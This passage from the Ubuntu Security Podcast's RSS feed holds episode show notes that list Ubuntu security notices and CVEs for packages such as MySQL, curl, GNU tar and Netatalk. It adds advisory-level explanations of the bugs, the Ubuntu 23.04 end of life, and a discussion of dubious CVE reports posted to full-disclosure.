<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-34194">CVE-2023-34194</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6614-1-amanda-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6614-1">USN-6614-1</a>] amanda vulnerability</h3>
<ul>
<li>1 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-30577">CVE-2023-30577</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6615-1-mysql-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6615-1">USN-6615-1</a>] MySQL vulnerabilities</h3>
<ul>
<li>22 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-20985">CVE-2024-20985</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20984">CVE-2024-20984</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20983">CVE-2024-20983</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20982">CVE-2024-20982</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20981">CVE-2024-20981</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20978">CVE-2024-20978</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20977">CVE-2024-20977</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20976">CVE-2024-20976</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20974">CVE-2024-20974</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20973">CVE-2024-20973</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20972">CVE-2024-20972</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20971">CVE-2024-20971</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20970">CVE-2024-20970</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20969">CVE-2024-20969</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20967">CVE-2024-20967</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20966">CVE-2024-20966</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20965">CVE-2024-20965</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20964">CVE-2024-20964</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20963">CVE-2024-20963</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20962">CVE-2024-20962</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20961">CVE-2024-20961</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-20960">CVE-2024-20960</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6616-1-openldap-vulnerability">[<a href="https://ubuntu.com/security/notices/USN-6616-1">USN-6616-1</a>] OpenLDAP vulnerability</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-2953">CVE-2023-2953</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6587-3-x-dot-org-x-server-regression">[<a href="https://ubuntu.com/security/notices/USN-6587-3">USN-6587-3</a>] X.Org X Server regression</h3>
<ul>
<li>6 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2024-21886">CVE-2024-21886</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-21885">CVE-2024-21885</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0409">CVE-2024-0409</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0408">CVE-2024-0408</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2024-0229">CVE-2024-0229</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6816">CVE-2023-6816</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6618-1-pillow-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6618-1">USN-6618-1</a>] Pillow vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-50447">CVE-2023-50447</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-44271">CVE-2023-44271</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h3 id="usn-6617-1-libde265-vulnerabilities">[<a href="https://ubuntu.com/security/notices/USN-6617-1">USN-6617-1</a>] libde265 vulnerabilities</h3>
<ul>
<li>14 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-36408">CVE-2021-36408</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21606">CVE-2020-21606</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21598">CVE-2020-21598</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21597">CVE-2020-21597</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21605">CVE-2020-21605</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21604">CVE-2020-21604</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21603">CVE-2020-21603</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21602">CVE-2020-21602</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21601">CVE-2020-21601</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21600">CVE-2020-21600</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21599">CVE-2020-21599</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21596">CVE-2020-21596</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21595">CVE-2020-21595</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-21594">CVE-2020-21594</a> <!-- raw HTML omitted --></li>
</ul>
</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-23-dot-04--lunar-lobster--eol--06-48">Ubuntu 23.04 (Lunar Lobster) EOL (06:48)</h3>
<ul>
<li>Released back in April 2023 - like all interim releases, supported for 9 months</li>
<li>Reached EOL on 25th January - won&rsquo;t receive any package updates (security or
bug fix) and will be archived to old-releases.ubuntu.com in the coming weeks</li>
<li>Urge to <a href="https://help.ubuntu.com/community/ManticUpgrades">upgrade to the currently supported interim release 23.10</a> ASAP as once
it does get archived the process to upgrade becomes harder (since you have to
<a href="https://help.ubuntu.com/community/EOLUpgrades">manually update</a> your apt sources to refer to the old-releases server first)</li>
<li>23.10 (Mantic Minotaur) will then be supported for about 5 more months until
July this year</li>
</ul>
<h3 id="awesome-appsec-in-ubuntu--08-22">Awesome AppSec in Ubuntu (08:22)</h3>
<ul>
<li><a href="https://discourse.ubuntu.com/t/awesome-appsec-in-ubuntu/41922/1">https://discourse.ubuntu.com/t/awesome-appsec-in-ubuntu/41922/1</a></li>
<li>Andrei has compiled a list of tools available in Ubuntu which can be used by
security researchers</li>
<li>Includes tools for:
<ul>
<li>Coordinated Vulnerability Disclosure</li>
<li>Fuzzing</li>
<li>License scanning</li>
<li>Reverse engineering</li>
<li>Runtime process analysis</li>
<li>Security linting</li>
<li>Symbolic execution</li>
<li>Threat modelling</li>
<li>Scanning for vulnerable dependencies</li>
<li>Web scanning</li>
<li>Runtime application isolation (sandboxing)</li>
</ul>
</li>
<li>Whether you are an software engineer looking to make your software more secure
or a security researcher trying to find vulns or even a security engineer
wanting tools to help with vulnerabililty management, there is likely
something in the list for you</li>
<li>If you find anything missing, send Andrei a PR as the list is hosted on Github</li>
</ul>
<h3 id="full-disclosure-spammed-with-zombie-cves--09-52">full-disclosure spammed with zombie CVEs (09:52)</h3>
<ul>
<li><a href="https://seclists.org/fulldisclosure/">full-disclosure</a> mailing list slowly declining in popularity but was once the
go-to place to discuss and disclose vulnerabilities</li>
<li>In January, saw a large increase in the number of messages posted (75 compared
to 15-30 which was the usual number posted for any month in 2023)</li>
<li>Meng Ruijie from National University in Singapore posted 36 different CVE
reports across a large range of OSS projects, including Redis Raft, TinyDTLS,
Mesa, ncurses, vim, GTK and more - and almost all of them were described as
NULL pointer dereferences or buffer overflows etc</li>
<li>Alan Coppersmith <a href="https://marc.info/?l=oss-security&amp;m=170630598729784">raised this</a> on the oss-security mailing list, since none of
these issues had been raised privately with any of these projects but also
that most of the CVE descriptions appeared to be quite bogus - e.g. for a CVE
in Mesa, where Meng describes them as a NULL pointer deref the associated
issue that the CVE points to in the upstream mesa gitlab describes a possible
OOB read but where there is no good evidence that this is able to be
influenced by the caller and hence there is no evidence that there is a
security issue here at all</li>
<li>They appear to have been assigned by just looking for either reports in
upstream issue trackers that mention possible security issues OR upstream
commits that mention words like NULL pointer dereference but without any
consideration as to whether these are actual vulnerabilities
<ul>
<li>For example - just because some code may potentially dereference a NULL
pointer, if the caller cannot influence that to occur then there is no way
to trigger it and so it is not an actual vulnerability</li>
</ul>
</li>
<li>Likely almost all of these CVEs will get disputed and so provide no real
value - also they waste the time of OSS developers to respond to these reports
as well as distros and others to investigate them etc</li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://lists.ubuntu.com/mailman/listinfo/ubuntu-hardened">ubuntu-hardened mailing list</a></li>
<li><a href="https://discourse.ubuntu.com/c/security">Security section on discourse.ubuntu.com</a></li>
<li><a href="https://fosstodon.org/@ubuntusecurity">@ubuntusecurity@fosstodon.org</a>, <a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E217.mp3" length="15306664" type="audio/mpeg" /><itunes:duration>906</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 216
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-216/</link>
          <pubDate>Fri, 15 Dec 2023 17:42:00 +1030 </pubDate>
          <dc:creator></dc:creator>
          <guid>a9b3c8424de1fec26c9ae3352932c8fc603ddf45496a325446d859d65d68cb0ba7b872c086f130aff9c646ddf3234459c2a141825bb5214be0d75f4c30e10c69</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 216</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          For the final episode of 2023 we discuss creating PoCs for vulns in tar and the
  looming EOL for Ubuntu 23.04, plus we look into security updates for curl,
  BlueZ, Netatalk, GNOME Settings and a heap more.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  For the final episode of 2023 we discuss creating PoCs for vulns in tar and the
  looming EOL for Ubuntu 23.04, plus we look into security updates for curl,
  BlueZ, Netatalk, GNOME Settings and a heap more.
  </itunes:summary>
        <description>  For the final episode of 2023 we discuss creating PoCs for vulns in tar and the
  looming EOL for Ubuntu 23.04, plus we look into security updates for curl,
  BlueZ, Netatalk, GNOME Settings and a heap more.
  </description>
        <googleplay:description>  For the final episode of 2023 we discuss creating PoCs for vulns in tar and the
  looming EOL for Ubuntu 23.04, plus we look into security updates for curl,
  BlueZ, Netatalk, GNOME Settings and a heap more.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>For the final episode of 2023 we discuss creating PoCs for vulns in tar and the
looming EOL for Ubuntu 23.04, plus we look into security updates for curl,
BlueZ, Netatalk, GNOME Settings and a heap more.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>57 unique CVEs addressed</p>
<h3 id="usn-6535-1-curl-vulnerabilities--00-54">[<a href="https://ubuntu.com/security/notices/USN-6535-1">USN-6535-1</a>] curl vulnerabilities (00:54)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-46219">CVE-2023-46219</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46218">CVE-2023-46218</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Mishandled cookies from domains with mixed case - allowing an attacker to
create so called &ldquo;super cookies&rdquo; that would then get passed back to more
domains that what is normally allowed - ie a site can set a cookie which is
then sent to different / unrelated sites. Depends on a feature called the
Public Suffix List which is a community initiative (led by Mozilla) to provide
an accurate list of domain name suffixes - ie. <code>.com</code> / <code>.org</code> but also <code>.co.uk</code>
etc - since there is no good algorithmic way of determining the highest level
at which a domain may be registered for a particular TLD as each registrar is
different
<ul>
<li>so could set a cookie with <code>domain=co.UK</code> with a URL of say <code>curl.co.uk</code> and
this would then get sent to every other <code>.co.uk</code> domain contrary to the
expectations of the PSL which lists <code>.co.uk</code> as a PSL domain</li>
</ul>
</li>
</ul>
<h3 id="usn-6463-2-open-vm-tools-vulnerabilities--02-56">[<a href="https://ubuntu.com/security/notices/USN-6463-2">USN-6463-2</a>] Open VM Tools vulnerabilities (02:56)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-34059">CVE-2023-34059</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-34058">CVE-2023-34058</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>SAML token signature bypass - allows an attacker who already has Guest
Operation Privileges within a guest VM to elevate their privileges if the VM
has been assigned a more privileged Guest Alias</li>
<li>File descriptor hijack vulnerability within the <code>vmware-user-suid</code> wrapper - a
local user with non-root privileges that is able to hijack the <code>/dev/uinput</code>
file descriptor may be able to simulate user inputs</li>
</ul>
<h3 id="usn-6538-1-postgresql-vulnerabilities--03-48">[<a href="https://ubuntu.com/security/notices/USN-6538-1">USN-6538-1</a>] PostgreSQL vulnerabilities (03:48)</h3>
<ul>
<li>3 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5870">CVE-2023-5870</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5869">CVE-2023-5869</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-5868">CVE-2023-5868</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Upgrades to the latest upstream point releases - includes both security and
bug fixes etc
<ul>
<li>15.5 (23.10, 23.04)</li>
<li>14.10 (22.04 LTS)</li>
<li>12.17 (20.04 LTS)</li>
</ul>
</li>
</ul>
<h3 id="usn-6539-1-python-cryptography-vulnerabilities--04-14">[<a href="https://ubuntu.com/security/notices/USN-6539-1">USN-6539-1</a>] python-cryptography vulnerabilities (04:14)</h3>
<ul>
<li>2 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-49083">CVE-2023-49083</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-23931">CVE-2023-23931</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>NULL pointer dereference / segfault on loading of crafted PKCS7 certificates</li>
</ul>
<h3 id="usn-6540-1-bluez-vulnerability--04-57">[<a href="https://ubuntu.com/security/notices/USN-6540-1">USN-6540-1</a>] BlueZ vulnerability (04:57)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-45866">CVE-2023-45866</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Whilst bluetooth discoverable, possible for an attacker to pair a HID device
and inject keystrokes etc without any intervention</li>
<li>Fixed by enabling the existing configuration <code>ClassicBondedOnly=true</code> - this may
break some legacy input devices like PS3 controller - in which case, should
edit <code>/etc/bluetooth/input.conf</code> and set this back to <code>false</code> but then beware that
you may be vulnerable to attack from anyone within bluetooth range <strong>when your
machines is discoverable</strong> - ie. bluetooth settings panel is open</li>
</ul>
<h3 id="usn-6541-1-gnu-c-library-vulnerabilities--06-30">[<a href="https://ubuntu.com/security/notices/USN-6541-1">USN-6541-1</a>] GNU C Library vulnerabilities (06:30)</h3>
<ul>
<li>3 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5156">CVE-2023-5156</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4813">CVE-2023-4813</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-4806">CVE-2023-4806</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Previous fix for CVE-2023-4806 was not sufficient - UAF in <code>getaddrinfo()</code> -
possible to still trigger</li>
</ul>
<h3 id="usn-6522-2-freerdp-vulnerabilities--07-00">[<a href="https://ubuntu.com/security/notices/USN-6522-2">USN-6522-2</a>] FreeRDP vulnerabilities (07:00)</h3>
<ul>
<li>3 CVEs addressed in Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-39356">CVE-2023-39356</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-39352">CVE-2023-39352</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-41877">CVE-2022-41877</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-215/#usn-6522-1-freerdp-vulnerabilities--01-39">[USN-6522-1] FreeRDP vulnerabilities from Episode 215</a></li>
</ul>
<h3 id="usn-6542-1-tinyxml-vulnerability--07-08">[<a href="https://ubuntu.com/security/notices/USN-6542-1">USN-6542-1</a>] TinyXML vulnerability (07:08)</h3>
<ul>
<li>1 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2021-42260">CVE-2021-42260</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Infinite loop able to be triggered by a crafted XML document - CPU-based DoS</li>
</ul>
<h3 id="usn-6543-1-gnu-tar-vulnerability--07-18">[<a href="https://ubuntu.com/security/notices/USN-6543-1">USN-6543-1</a>] GNU Tar vulnerability (07:18)</h3>
<ul>
<li>
<p>1 CVEs addressed in Trusty ESM (14.04 ESM), Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)</p>
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-39804">CVE-2023-39804</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>
<p>Stack buffer overflow on parsing a tar archive with an extremely large
extended attribute name/value - <code>PAX</code> archive format allows to store extended
attributes - on the kernel&rsquo;s VFS layer these are limited to 255 bytes for the
name and 64kB for the value - but in a tar these can be basically arbitrary</p>
</li>
<li>
<p>When processing the archive, tar would allocate space for these on the stack -
BUT the stack is limited to a maximum size of 8MB normally - so if can specify
an xattr name of more than 8MB can overflow the entire stack memory region -
then into guard pages or even beyond, triggering a segfault or at worst a heap
corruption and hence possible RCE -&gt; but in Ubuntu we have enabled stack clash
protection <a href="https://lists.ubuntu.com/archives/ubuntu-devel/2019-June/040741.html">since 19.10</a> - which turns this into a DoS only</p>
<ul>
<li>Reminiscent of the original Stack Clash &ldquo;System Down&rdquo; vulnerability in systemd</li>
</ul>
<!-- raw HTML omitted -->
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>$ hardening-check $(which tar)
</span></span><span style="display:flex;"><span>/usr/bin/tar:
</span></span><span style="display:flex;"><span> Position Independent Executable: yes
</span></span><span style="display:flex;"><span> Stack protected: yes
</span></span><span style="display:flex;"><span> Fortify Source functions: yes (some protected functions found)
</span></span><span style="display:flex;"><span> Read-only relocations: yes
</span></span><span style="display:flex;"><span> Immediate binding: yes
</span></span><span style="display:flex;"><span> Stack clash protection: yes
</span></span><span style="display:flex;"><span> Control flow integrity: yes
</span></span></code></pre></div></li>
<li>
<p>Speaking from experience, it is not easy to create such an archive - either
through a real xattr on disk or through specifying one on the command-line
(since you can specify arbitrary attributes be stored for files when adding
them to an archive but then you hit the maximum limit of command-line
arguments) BUT it is possible - in my case I did this though using sed to
replace the contents of a xattr name in an existing archive with a crafted one
and then doing a bunch of other hacks to fixup all the metadata of the tar
archive to match - helpfully, all these attributes in the archive are stored
as NUL-terminated strings, so can simply used sed to fix them all up assuming
you can calculate the correct values</p>
</li>
<li>
<p>Fixed by instead allocating these on the heap which does not have the same
arbitrary limitation as the stack</p>
</li>
</ul>
<h3 id="usn-6500-2-squid-vulnerabilities--11-35">[<a href="https://ubuntu.com/security/notices/USN-6500-2">USN-6500-2</a>] Squid vulnerabilities (11:35)</h3>
<ul>
<li>2 CVEs addressed in Xenial ESM (16.04 ESM), Bionic ESM (18.04 ESM)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-46847">CVE-2023-46847</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-46728">CVE-2023-46728</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li><a href="/episode-214/#usn-6500-1-squid-vulnerabilities--10-20">[USN-6500-1] Squid vulnerabilities from Episode 214</a></li>
</ul>
<h3 id="usn-6544-1-gnu-binutils-vulnerabilities--11-44">[<a href="https://ubuntu.com/security/notices/USN-6544-1">USN-6544-1</a>] GNU binutils vulnerabilities (11:44)</h3>
<ul>
<li>5 CVEs addressed in Trusty ESM (14.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2022-35205">CVE-2022-35205</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2021-46174">CVE-2021-46174</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2020-19726">CVE-2020-19726</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-4285">CVE-2022-4285</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-38533">CVE-2022-38533</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Didn&rsquo;t do bounds checking properly in various places - leading to heap buffer
overflows / OOB reads etc in various things like <code>objdump</code> etc</li>
</ul>
<h3 id="usn-6545-1-webkitgtk-vulnerabilities--12-08">[<a href="https://ubuntu.com/security/notices/USN-6545-1">USN-6545-1</a>] WebKitGTK vulnerabilities (12:08)</h3>
<ul>
<li>2 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-42917">CVE-2023-42917</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-42916">CVE-2023-42916</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Both issues that come from upstream webkit
<ul>
<li>OOB read -&gt; info leak</li>
<li>Memory corruption that Apple said was being exploited in the wild against
various versions of iOS</li>
</ul>
</li>
</ul>
<h3 id="usn-6546-1-libreoffice-vulnerabilities--12-45">[<a href="https://ubuntu.com/security/notices/USN-6546-1">USN-6546-1</a>] LibreOffice vulnerabilities (12:45)</h3>
<ul>
<li>2 CVEs addressed in Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-6186">CVE-2023-6186</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2023-6185">CVE-2023-6185</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Uses gstreamer to play embedded videos (presumably in presentations etc) - to
do this, creates a gstreamer pipeline including the filename of the video
itself - this was not adequetely escaped, so could allow arbitrary code
execution if it contained shell meta characters etc</li>
<li>Link targets allow arbitrary script execution - similar to historic
CVE-2023-2255 from <a href="/episode-198/#usn-6144-1-libreoffice-vulnerabilities--10-59">[USN-6144-1] LibreOffice vulnerabilities in Episode 198</a></li>
</ul>
<h3 id="usn-6547-1-python-vulnerability--13-46">[<a href="https://ubuntu.com/security/notices/USN-6547-1">USN-6547-1</a>] Python vulnerability (13:46)</h3>
<ul>
<li>1 CVEs addressed in Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-41105">CVE-2023-41105</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Issue specific to Python 3.11 where if a path contained an embedded NUL byte
and was passed to <code>os.path.normpath()</code> it would get truncated at the NUL byte -
fixed to remove this behaviour</li>
</ul>
<h3 id="usn-6550-1-postfixadmin-vulnerabilities--14-19">[<a href="https://ubuntu.com/security/notices/USN-6550-1">USN-6550-1</a>] PostfixAdmin vulnerabilities (14:19)</h3>
<ul>
<li>3 CVEs addressed in Bionic ESM (18.04 ESM), Focal (20.04 LTS), Jammy (22.04 LTS)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-28447">CVE-2023-28447</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-31129">CVE-2022-31129</a> <!-- raw HTML omitted --></li>
<li><a href="https://ubuntu.com/security/CVE-2022-29221">CVE-2022-29221</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Issues in various embedded modules - Smarty and Moment.js - allowing possible
arbitrary code execution, XSS or DoS</li>
</ul>
<h3 id="usn-6551-1-ghostscript-vulnerability--14-37">[<a href="https://ubuntu.com/security/notices/USN-6551-1">USN-6551-1</a>] Ghostscript vulnerability (14:37)</h3>
<ul>
<li>1 CVEs addressed in Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-46751">CVE-2023-46751</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>UAF on file object on error path</li>
</ul>
<h3 id="usn-6552-1-netatalk-vulnerability--14-43">[<a href="https://ubuntu.com/security/notices/USN-6552-1">USN-6552-1</a>] Netatalk vulnerability (14:43)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-42464">CVE-2023-42464</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>Apple Filing Protocol (AFP) service - similar to SMB for Windows - allows a
Ubuntu machine to share files with MacOS</li>
<li>Also implements support for Spotlight to search - using tracker as the
indexer, metadata store and search engine under-the-hood</li>
<li>Parser for spotlight RPC packets failed to properly do type checking,
resulting in a type confusion bug and possible RCE via memory corruption -
similar to CVE-2023-34967 for Samba since the code in netatalk originated from
that code from Samba (<a href="/episode-204/#usn-6238-1-samba-vulnerabilities-01-15">[USN-6238-1] Samba vulnerabilities from Episode 204</a>)</li>
</ul>
<h3 id="usn-6554-1-gnome-settings-vulnerability--15-57">[<a href="https://ubuntu.com/security/notices/USN-6554-1">USN-6554-1</a>] GNOME Settings vulnerability (15:57)</h3>
<ul>
<li>1 CVEs addressed in Focal (20.04 LTS), Jammy (22.04 LTS), Lunar (23.04), Mantic (23.10)
<ul>
<li><a href="https://ubuntu.com/security/CVE-2023-5616">CVE-2023-5616</a> <!-- raw HTML omitted --></li>
</ul>
</li>
<li>GNOME settings allows the ability to turn on / off remote SSH access from the
sharing panel within the main settings application in Ubuntu</li>
<li>Since moving to <a href="https://discourse.ubuntu.com/t/sshd-now-uses-socket-based-activation-ubuntu-22-10-and-later/30189">socket activated SSHd</a> in 22.10, GNOME Settings was never
updated in Ubuntu to support this as well</li>
<li>Would mean that it would always show the machine was not accessible / sharing
via SSH even when it was (since it would only check the status of the
ssh.service, not ssh.socket)</li>
